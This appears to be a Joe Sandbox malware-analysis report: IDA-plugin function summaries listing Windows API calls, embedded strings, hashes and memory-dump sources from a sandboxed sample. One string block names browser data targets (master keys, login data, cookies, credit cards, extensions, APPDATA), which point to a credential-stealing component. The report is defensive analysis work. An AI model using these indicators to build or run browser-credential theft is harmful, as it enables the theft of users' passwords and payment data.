                                                                                                                                              • Opcode Fuzzy Hash: 048b79132d7841d444e4610d40c491225c5975a6c75bfd698fb6a53a420acd23
                                                                                                                                              • Instruction Fuzzy Hash: CBD19071A083418FDB25DF24D844B6FBBE2BFC8314F14482DE59997250EB35984ACF9A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • LCMapStringW.KERNEL32(00000000,00000100,0043A9D4,00000001,00000000,00000000,0043B208,00000038,00417C80,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 0041D695
                                                                                                                                              • GetLastError.KERNEL32 ref: 0041D6A7
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00417F33,?,00000000,00000000,0043B208,00000038,00417C80,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 0041D72E
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,00417F33,?,?,00000000), ref: 0041D7AF
                                                                                                                                              • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041D7C9
                                                                                                                                              • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 0041D804
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1775797328-0
                                                                                                                                              • Opcode ID: 4e68df62db2da08941074baaceedf4420aa6fcb3e7720cbc62ad2245d21ccbe8
                                                                                                                                              • Instruction ID: f05e7c59ad7515b7832d4e1e93c16c6c87d040a29f1d2ebd5c0f6427fa4a6e31
                                                                                                                                              • Opcode Fuzzy Hash: 4e68df62db2da08941074baaceedf4420aa6fcb3e7720cbc62ad2245d21ccbe8
                                                                                                                                              • Instruction Fuzzy Hash: C0B139B2D00219EFCF21AFA4DC859EE7B75FF08354F14412AF925A2260D7398DA1DB58
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025CBCE0: AcquireSRWLockExclusive.KERNEL32(00000008), ref: 025CBD39
                                                                                                                                                • Part of subcall function 025CBCE0: HeapFree.KERNEL32(00000000,00000000), ref: 025CBDE9
                                                                                                                                                • Part of subcall function 025CBCE0: HeapFree.KERNEL32(00000000,?), ref: 025CBDFA
                                                                                                                                                • Part of subcall function 025CBCE0: ReleaseSRWLockExclusive.KERNEL32(?), ref: 025CBE0C
                                                                                                                                                • Part of subcall function 025BFE20: TlsGetValue.KERNEL32(00000000,00000000,025CC23F), ref: 025BFE2C
                                                                                                                                                • Part of subcall function 025BFE20: TlsGetValue.KERNEL32(00000000), ref: 025BFE4A
                                                                                                                                                • Part of subcall function 025BFE20: TlsSetValue.KERNEL32(00000000,00000000), ref: 025BFE8A
                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(00000000), ref: 025CC276
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025CC328
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000004), ref: 025CC339
                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 025CC352
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000003), ref: 025CC41D
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025CC42E
                                                                                                                                              Strings
                                                                                                                                              • stdoutstderrlibrary\std\src\io\mod.rs, xrefs: 025CC211
                                                                                                                                              • lock count overflow in reentrant mutexlibrary\std\src\sync\remutex.rs, xrefs: 025CC25B
                                                                                                                                              • cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs, xrefs: 025CC37B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$ExclusiveLock$Value$AcquireRelease
                                                                                                                                              • String ID: cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs$lock count overflow in reentrant mutexlibrary\std\src\sync\remutex.rs$stdoutstderrlibrary\std\src\io\mod.rs
                                                                                                                                              • API String ID: 3691851813-1631872077
                                                                                                                                              • Opcode ID: bf985dc5be0ccb763cb945a60c49798bfb5b0934dfacd4d4d8d910dc6f9a170e
                                                                                                                                              • Instruction ID: 3ce5c6896de402d979fa9b3c03495f956da2d60eb709fffacea1d32c122e6259
                                                                                                                                              • Opcode Fuzzy Hash: bf985dc5be0ccb763cb945a60c49798bfb5b0934dfacd4d4d8d910dc6f9a170e
                                                                                                                                              • Instruction Fuzzy Hash: 94618CB1D00208CFDF24CFD4E988BAEBBB5FB08705F14441AE905AB691E7759849CF58
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • FindResourceA.KERNEL32(?,00000000,00000005), ref: 00423039
                                                                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00423041
                                                                                                                                                • Part of subcall function 004247EA: UnhookWindowsHookEx.USER32(?), ref: 0042480F
                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00423053
                                                                                                                                              • GetDesktopWindow.USER32 ref: 00423080
                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 0042308E
                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 0042309D
                                                                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 0042312C
                                                                                                                                              • GetActiveWindow.USER32 ref: 00423137
                                                                                                                                              • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00423145
                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00423161
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeHookLoadLockUnhookWindows
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3362358738-0
                                                                                                                                              • Opcode ID: 23e7f65befa7440df8e79eeea8a432c85f5a5959caccd24c17b927ce82f2994f
                                                                                                                                              • Instruction ID: 44036482665cc7e11abf287e92ecc354a93a460278f6ee91648675104effe8f1
                                                                                                                                              • Opcode Fuzzy Hash: 23e7f65befa7440df8e79eeea8a432c85f5a5959caccd24c17b927ce82f2994f
                                                                                                                                              • Instruction Fuzzy Hash: F241A531700625DBCB21AFA5E94977FBBB4EF44716F90003FE501A22A1C7BC5E45CA69
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetPropA.USER32(?,AfxOldWndProc423), ref: 0042567A
                                                                                                                                              • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 004256D8
                                                                                                                                                • Part of subcall function 00424C8B: GetWindowRect.USER32(?,00424DAD), ref: 00424CB0
                                                                                                                                                • Part of subcall function 00424C8B: GetWindow.USER32(?,00000004), ref: 00424CCD
                                                                                                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 00425708
                                                                                                                                              • RemovePropA.USER32(?,AfxOldWndProc423), ref: 00425710
                                                                                                                                              • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 00425717
                                                                                                                                              • GlobalDeleteAtom.KERNEL32(00000000), ref: 0042571E
                                                                                                                                                • Part of subcall function 00423DB0: GetWindowRect.USER32(?,?), ref: 00423DBC
                                                                                                                                              • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 00425772
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindLongRemove
                                                                                                                                              • String ID: AfxOldWndProc423
                                                                                                                                              • API String ID: 3892049428-1060338832
                                                                                                                                              • Opcode ID: 10d2a5aec3b997577270dab6d298fc0b9cd5d1bcd177ddbbb5c5fac6d3cc76f4
                                                                                                                                              • Instruction ID: c58938d15ef85ceb471def29655ae59a85cb9400ae0611950666c80f8e2187a5
                                                                                                                                              • Opcode Fuzzy Hash: 10d2a5aec3b997577270dab6d298fc0b9cd5d1bcd177ddbbb5c5fac6d3cc76f4
                                                                                                                                              • Instruction Fuzzy Hash: E1318332A0012AEBCB11AFA5ED49DBF7B78FF89310F80012AF511A2150D7789911DB69
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00427B53
                                                                                                                                              • GetStockObject.GDI32(0000000D), ref: 00427B5B
                                                                                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 00427B68
                                                                                                                                              • GetDC.USER32(00000000), ref: 00427B77
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00427B8B
                                                                                                                                              • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 00427B97
                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00427BA2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                                              • String ID: System
                                                                                                                                              • API String ID: 46613423-3470857405
                                                                                                                                              • Opcode ID: 3618959336a5d2387a8584dc03d5aa96b6a4e2ba3ebebbc47e731d6b0f56e9d2
                                                                                                                                              • Instruction ID: 7761e190ee946e44623cd7a4fdd5fc82f47dd554012855bd1365dda4637adce3
                                                                                                                                              • Opcode Fuzzy Hash: 3618959336a5d2387a8584dc03d5aa96b6a4e2ba3ebebbc47e731d6b0f56e9d2
                                                                                                                                              • Instruction Fuzzy Hash: F5115471B00218EBDB10EBA0ED45F9E3B74EF14745F904035F605AA190D7B4AD46CB68
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,00424635,?,00040000), ref: 00423CC1
                                                                                                                                              • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 00423CCA
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00423CDE
                                                                                                                                              • #17.COMCTL32 ref: 00423CF9
                                                                                                                                              • #17.COMCTL32 ref: 00423D15
                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00423D22
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                                                                                              • String ID: COMCTL32.DLL$InitCommonControlsEx
                                                                                                                                              • API String ID: 1437655972-4218389149
                                                                                                                                              • Opcode ID: bf34ed095592dcafb683c73bd76fb3753a0aa3a0d8d12ebda3a1314fc7045279
                                                                                                                                              • Instruction ID: d616edb962f15808b37bc422b71edd0b26b380362643589d42d25bf3a016dfe7
                                                                                                                                              • Opcode Fuzzy Hash: bf34ed095592dcafb683c73bd76fb3753a0aa3a0d8d12ebda3a1314fc7045279
                                                                                                                                              • Instruction Fuzzy Hash: 72F0F936B143229797219FE0BC4891BB6B8AF95722B814436F801E3211CF2CCD0B467D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025CFEC0: HeapFree.KERNEL32(00000000,?), ref: 025D0037
                                                                                                                                                • Part of subcall function 025CFEC0: HeapFree.KERNEL32(00000000,?), ref: 025D004C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257F462
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257F481
                                                                                                                                              Strings
                                                                                                                                              • a Display implementation returned an error unexpectedly, xrefs: 0257F6F1
                                                                                                                                              • , xrefs: 0257F608
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID: $a Display implementation returned an error unexpectedly
                                                                                                                                              • API String ID: 3298025750-229198390
                                                                                                                                              • Opcode ID: 1327cc83d4e738f8f7a85ccf93ec401d5d934260b18960a868c905cd48b0847c
                                                                                                                                              • Instruction ID: afe080cc0331431099df4263edd47217921ea2f068dddd5eee3441c444d60305
                                                                                                                                              • Opcode Fuzzy Hash: 1327cc83d4e738f8f7a85ccf93ec401d5d934260b18960a868c905cd48b0847c
                                                                                                                                              • Instruction Fuzzy Hash: 96F19F71A08341AFDB64DF24D884B6FBBE2BFC4304F14482DF98997691EB319905CB5A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025D04D0: TlsGetValue.KERNEL32(00000000), ref: 025D04E9
                                                                                                                                                • Part of subcall function 025D04D0: TlsGetValue.KERNEL32(00000000), ref: 025D0510
                                                                                                                                                • Part of subcall function 025D04D0: TlsSetValue.KERNEL32(00000000,00000000), ref: 025D055E
                                                                                                                                                • Part of subcall function 025D04D0: BCryptGenRandom.BCRYPT(00000000,?,00000010,00000002), ref: 025D0574
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257C4B0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257C64B
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257C6DF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257C71B
                                                                                                                                              Strings
                                                                                                                                              • nametitlebodystruct RecvSfilemaster_keyprofileslocal_statelogin_datacookieshistorycreditcardslocalstate_cachelogins_master_keyextensionsFailed building the Runtime, xrefs: 0257C3A0
                                                                                                                                              • APPDATA, xrefs: 0257C521
                                                                                                                                              • Invalid, xrefs: 0257C6C0
                                                                                                                                              • path*fatal runtime error: I/O error: operation failed to complete synchronously, xrefs: 0257C3CD
                                                                                                                                              • cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs, xrefs: 0257C744
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$Value$CryptRandom
                                                                                                                                              • String ID: APPDATA$Invalid$cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs$nametitlebodystruct RecvSfilemaster_keyprofileslocal_statelogin_datacookieshistorycreditcardslocalstate_cachelogins_master_keyextensionsFailed building the Runtime$path*fatal runtime error: I/O error: operation failed to complete synchronously
                                                                                                                                              • API String ID: 740635937-1962946080
                                                                                                                                              • Opcode ID: 737438f561b1a1119f6bac2308a44188733521f42586dea12bc7b942a5c6ba83
                                                                                                                                              • Instruction ID: 77a94ffe1a39eb722e1642e7414f4767b0124cbbd1bf8293c8fa52d0bbdb8906
                                                                                                                                              • Opcode Fuzzy Hash: 737438f561b1a1119f6bac2308a44188733521f42586dea12bc7b942a5c6ba83
                                                                                                                                              • Instruction Fuzzy Hash: 4AC16B71A083419FD724DF29D880B5BBBE2BFC8314F04892EE99997350EB71D945CB86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • CompareStringW.KERNEL32(00000000,00000000,0043A9D4,00000001,0043A9D4,00000001,0043B4A8,00000040,00420655,?,00000001,?,00000000,?,00000000,?), ref: 00420A50
                                                                                                                                              • GetLastError.KERNEL32(?,0041FB6C,00000000,00000000,00000000,00000000,00000000,?,0041DD55,00000007,?,?,00000000,00000006,00000006), ref: 00420A62
                                                                                                                                              • GetCPInfo.KERNEL32(00000000,0041509C,0043B4A8,00000040,00420655,?,00000001,?,00000000,?,00000000,?,?,0041FB6C,00000000,00000000), ref: 00420B0C
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,0041FB6C,00000000,00000000,00000000,00000000,00000000,?,0041DD55,00000007), ref: 00420B9A
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000064,00000000,?,0041FB6C,00000000,00000000,00000000,00000000,00000000,?,0041DD55,00000007), ref: 00420C13
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,004151C7,00000000,00000000,?,0041FB6C,00000000,00000000,00000000,00000000,00000000,?,0041DD55,00000007), ref: 00420C30
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,004151C7,?,00000000,?,0041FB6C,00000000,00000000,00000000,00000000,00000000,?,0041DD55,00000007), ref: 00420CA6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1773772771-0
                                                                                                                                              • Opcode ID: edf37570b9a6133125698eafa9279b85b7ab7cef9f5632037470c00f62594779
                                                                                                                                              • Instruction ID: 81078ee3ce04f899a7a6ce9267cfb065c325f8bad144afdf8676d079718d4fdb
                                                                                                                                              • Opcode Fuzzy Hash: edf37570b9a6133125698eafa9279b85b7ab7cef9f5632037470c00f62594779
                                                                                                                                              • Instruction Fuzzy Hash: 33B19C71A00229EBCF21CF95EC81AEF7BF5EF45314FA4012BF810A6262D7799851CB59
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClearVariant$AllocStringlstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3271446295-0
                                                                                                                                              • Opcode ID: 6282ef1ab9a2c62f5340b2b8bd7b05e750a85b2b0af811c20b1538a789a0357b
                                                                                                                                              • Instruction ID: cdccc334731853226970ff56d724ea0fd08195d0ec7bcfd3a5b41d5743917be6
                                                                                                                                              • Opcode Fuzzy Hash: 6282ef1ab9a2c62f5340b2b8bd7b05e750a85b2b0af811c20b1538a789a0357b
                                                                                                                                              • Instruction Fuzzy Hash: 90617E71E00219EFCF10EFA4DC85AEEBBB5BF04300F94452AF555A7250D7789985CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetSystemMetrics.USER32(0000002A), ref: 00422EB8
                                                                                                                                              • GlobalLock.KERNEL32(00000000,?,?,?,?), ref: 00422F23
                                                                                                                                              • CreateDialogIndirectParamA.USER32(?,?,?,Function_0002288B,00000000), ref: 00422F52
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDialogGlobalIndirectLockMetricsParamSystem
                                                                                                                                              • String ID: MS Shell Dlg
                                                                                                                                              • API String ID: 3758755205-76309092
                                                                                                                                              • Opcode ID: 152948b375090ba3bf973604bc07184c04cab0d5ef470bd3cd5d12d947ef66b1
                                                                                                                                              • Instruction ID: ca2fc6de147dc94a796e69e52f3573e941c4428df88ff4a11067891bc5981fc6
                                                                                                                                              • Opcode Fuzzy Hash: 152948b375090ba3bf973604bc07184c04cab0d5ef470bd3cd5d12d947ef66b1
                                                                                                                                              • Instruction Fuzzy Hash: CE51F131B00225EFCB11EF64EA459EEBBB0EF44314F95066AF801E7251D7B88940DB99
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0041A7D1
                                                                                                                                              • GetStdHandle.KERNEL32(000000F4,0043A928,00000000,?,00000000,00000000,00000000,00000000), ref: 0041A8AC
                                                                                                                                              • WriteFile.KERNEL32(00000000), ref: 0041A8B3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$HandleModuleNameWrite
                                                                                                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                              • API String ID: 3784150691-4022980321
                                                                                                                                              • Opcode ID: 5eb8b9adc66271577908d0f2b30b26b3f93ca16067fc2b3402f50ca97e530117
                                                                                                                                              • Instruction ID: 873bd3f0479595d816e6d3d2c3c66433944047767b5fc083997a35eeea225ff6
                                                                                                                                              • Opcode Fuzzy Hash: 5eb8b9adc66271577908d0f2b30b26b3f93ca16067fc2b3402f50ca97e530117
                                                                                                                                              • Instruction Fuzzy Hash: 51314572540204ABD720EB70CC82FEA33B89F4A314F11492BF566E2182DA3CE9D1CA5D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,0043B1D8,00000118,004177DE,00000001,00000000,0043A508,00000008,0041A8CA,00000000,00000000,00000000), ref: 0041C956
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileModuleName
                                                                                                                                              • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                                                                                              • API String ID: 514040917-1673886896
                                                                                                                                              • Opcode ID: afbd14b618276193030e3c0af5201b55a9026821446303c7d5f8591930f4bbdf
                                                                                                                                              • Instruction ID: f9b76a29898f58c7373b8753ea105286733a2ff1b2e8d5243023788ac5f4ec33
                                                                                                                                              • Opcode Fuzzy Hash: afbd14b618276193030e3c0af5201b55a9026821446303c7d5f8591930f4bbdf
                                                                                                                                              • Instruction Fuzzy Hash: CA31B7719412186BCB11EB61CC82FDE37789F09368F11415FF118B6182DB7CDA918BAD
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0042BEA5
                                                                                                                                              • PathFindExtensionA.SHLWAPI(?), ref: 0042BEB2
                                                                                                                                                • Part of subcall function 0042BE3A: PathFindFileNameA.SHLWAPI(?,00427185,?,?,?), ref: 0042BE3E
                                                                                                                                                • Part of subcall function 0042BE3A: lstrlenA.KERNEL32(00000000), ref: 0042BE4C
                                                                                                                                              • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0042BF3D
                                                                                                                                              • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0042BF6A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFindNamePath$ExtensionModulelstrcatlstrcpylstrlen
                                                                                                                                              • String ID: .CHM$.HLP$.INI
                                                                                                                                              • API String ID: 3409542269-4017452060
                                                                                                                                              • Opcode ID: 5208ab65a18fcb4c340f3c54e1a250997058e9b9430b917999dc72298521812a
                                                                                                                                              • Instruction ID: f23bd32b8940e093c85a1fee808d6a361bb9d4e487b19eb4f682e07407b9da65
                                                                                                                                              • Opcode Fuzzy Hash: 5208ab65a18fcb4c340f3c54e1a250997058e9b9430b917999dc72298521812a
                                                                                                                                              • Instruction Fuzzy Hash: 76314D71A447289FCB21DB65ED44ADAB7F8FB18304F9048ABE586D7240D7B8E980CF54
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
